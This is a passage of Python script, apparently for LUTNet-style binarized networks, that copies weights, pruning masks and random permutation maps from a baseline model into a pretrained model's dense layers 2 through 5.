print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 2 bl_w1 = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_1"]["residual_sign_1"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_1"]["residual_sign_1"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_15:0"] pret_c16= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_16:0"] pret_c17= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_26:0"] pret_c27= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] = c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] = rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 3 bl_w1 = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_2"]["residual_sign_2"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_2"]["residual_sign_2"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_15:0"] pret_c16= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_16:0"] pret_c17= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_26:0"] pret_c27= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] = c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] = rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 4 bl_w1 = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_3"]["residual_sign_3"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_3"]["residual_sign_3"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_15:0"] pret_c16= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_16:0"] pret_c17= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_26:0"] pret_c27= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] = c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] = rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 5 bl_w1 = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_4"]["residual_sign_4"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_4"]["residual_sign_4"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_15:0"] pret_c16= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_16:0"] pret_c17= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_26:0"] pret_c27= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_27:0"] pret_c28= 